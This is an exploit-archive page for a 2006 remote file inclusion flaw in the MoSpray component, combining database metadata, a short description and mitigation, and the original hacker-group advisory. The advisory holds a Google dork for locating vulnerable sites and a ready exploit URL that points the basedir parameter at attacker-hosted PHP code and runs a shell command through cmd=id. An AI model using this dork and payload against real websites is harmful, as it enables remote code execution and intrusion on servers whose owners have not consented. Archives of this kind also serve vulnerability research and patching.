header-logo
Suggest Exploit
vendor:
MoSpray
by:
Kurdish Security
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: MoSpray
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

MoSpray Remote File Include Vulnerability

MoSpray is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

>>> Kurdish Security
>>> MoSpray Remote File Include Vulnerability
>>> Original Advisory : http://kurdishsecurity.blogspot.com/2006/07/kurdish-security-14-mospray-basedir.html

>>> Freedom For Ocalan

>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com
>>> Rish : High
>>> Class : Remote
>>> Script : MoSpray
>>> Site : http://www.caneblu.com
>>> Thanx : kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca and other my friends


codes
require("$basedir/components/com_mospray/lang/$lang/admin.php");

d0rkiz : allinurl:"com_mospray"

http://www.site.com/components/com_mospray/scripts/admin.php?basedir=yourcode.txt?&cmd=id

Used link :]

admin.php
details.php
modify.php
newgroup.php
newtask.php
rss.php

e0f

# milw0rm.com [2006-07-23]